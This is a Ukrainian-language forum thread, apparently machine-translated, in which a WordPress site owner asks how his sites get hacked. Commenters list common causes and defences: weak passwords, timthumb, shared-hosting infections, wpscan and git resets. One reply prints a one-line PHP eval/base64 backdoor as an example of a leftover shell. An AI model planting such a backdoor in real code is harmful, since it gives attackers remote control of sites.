Як ламають wordpress (рубрика програмування)

Я ось роблю часто і досить багато сайти на WordPress і їх постійно ламають.
Ясна річ що бек-ап є і відновити не складно, і плагіни стоять антивірусні всякі.
Але блін я вже настільки втомився від цих вразливостей що вирішив вивчити проблему з іншого боку.
Я ось створив сайт на WP 3.5.1 такий же як і інші мої.
Встановив куплену тему, подібну як і на інших сайтах.
Хто небудь може поламати і тут розповісти хід кроків? або якщо не тут то в пості.
Так я хочу навчиться ламати вордпресс, але не зметою пакостити а з метою самонавчання і розуміння того як мислить хакер і які мені дірки латати в будуещем.

Як ламають WordPress. 5.0 out of 5 based on 1 rating

Як ламають wordpress (рубрика програмування)
WordPress зустріч з програмістом
Як ламають wordpress (рубрика програмування)
Всім привіт! Встановив гру HMM6 під виндоуз віста.

я думаю логічніше шукати по логам відразу після встановлення факту злому. Я з WP давно дружу і плагіни під нього писав, але ось сайти мої ще жодного разу ні-ні, можливо вони просто нікого не цікавили (більшість сайтів для штатів).

Це я до чого - там ЗРОБИТИ самому дірку, написавши плагін, який як мінімум не буде фільтрувати одержувані від користувача дані - вже величезна дірка, тому обов'язково дивимося на те, які плагіни у тебе були, що взагалі ставив, права на папки дивимося.

і, так, WP звідки качати? аргінал або російську перелопаченную версію?

до речі, може і сам хостер дірявий, якщо це завжди на одному і тому ж хостингу відбувається.

АААА блять ХТО ЇХ ВИПУСТИВ ?!

Вас напевно всіх в Гуглі забанили

в пхп завжди будуть дірки, він навіть уже рубай з рейками пішов по швах, як за нього взялися серйозно. Найнадійніший варіант це Java, хоча і в ній дірки бувають, але рівень безпеки у неї дуже високий.

вордпресс чистий і завжди тільки з оф сайту. плагіни сам ставлю якщо тільки з безпеки і сео. обидва з високими рейтингами і ймовірність що мають дірку вони мала, так як в обговореннях до плагінів зауважень не зустрічалося. ймовірно теми мають вбудовані плагіни можуть діряві. Зараз за результатами гугла є хвиля захлеснула ВП сайти. всюди один сценарій - замість сайту порожня сторінка з написом Hacked by% somebody%. всередині в адмінці кракозябри, змінена кодування бази.

ось дізнатися б технологію саме цих зломів.

Друг мій, що ти ввів видає мільйон результатів з початку ери. я ж кажу про останні збірках 3.5 і вище. але навіть якщо у гугла попросити запити за останній проміжок з дати виходу 3.5 корисних результатів знайти не вдається. тільки розмови про те як лікувати - а це в сотнях варіантів написання фрази аля "робіть часто бек ап" або "переустановите вордпресс" - все.

в блозі помойму немає тих кого в "Гуглі забанили". Тут все питають як у одного близького. Он пам'ятаю на пітер блозі радили де соус тобаско купити. хоча яндекс карта могла дати сотні результатів.

останній жарт про Java: «Java 8 will offer an exploit API.»

скануй сайт wpscan'ом, є в десятеро backtrack. Потім в 3.5.1 і нижче є розкриття шляхів, ламати сусідів і шукати тебе досить легко. в адмінці заборона на заливку тим і плагінів, якщо будеш грішити на брут - додатково htaccesом закрий на доступ з твого айпі і все. машину свою на віруси перевір ще. питання будуть - пиши.

Його трохи гамірно налаштовувати) Можливо через це багато пишуть що не працює.

Ламати не навчилися, але ось тобі круте рішення. Додаєш сайт в git (або іншу систему контролю версій), і по крону робиш reset hard. Тобто перетіраются всі файли, яких немає в системі контрооля версій. І, звичайно ж, вирубують ftp на серваке.

багато річний досвід говорить наступне:
1. весь рунет постійно сканується на слабкі паролі на вордпресс-сайтах (якщо посомтреть логи, можна побачити запити пост в wp-login.php. На одному спостережуваному сайті бачив 5 різних сканерів в один день). Відповідно часта проблема - словникові паролі (admin, 123456, qwerty9876 ітд)
2. timthumb звичайно ж.
3. Завірусованние сайти на цьому ж хостингу - скрипту пофіг на домен, він сканує файлову систему і заражає всі php-файли.
4. Закладки, що залишилися з пердидущіх заражень типу
if (isset ($ _POST [ 'php'])) eval (base64_decode ($ _POST [ 'php']))
ну сюди ж віднесемо залиті шелли.

за статистикою 90% заражень відбувається з першої причини. 3 і 4 пункти випливають з першого.

Схожі статті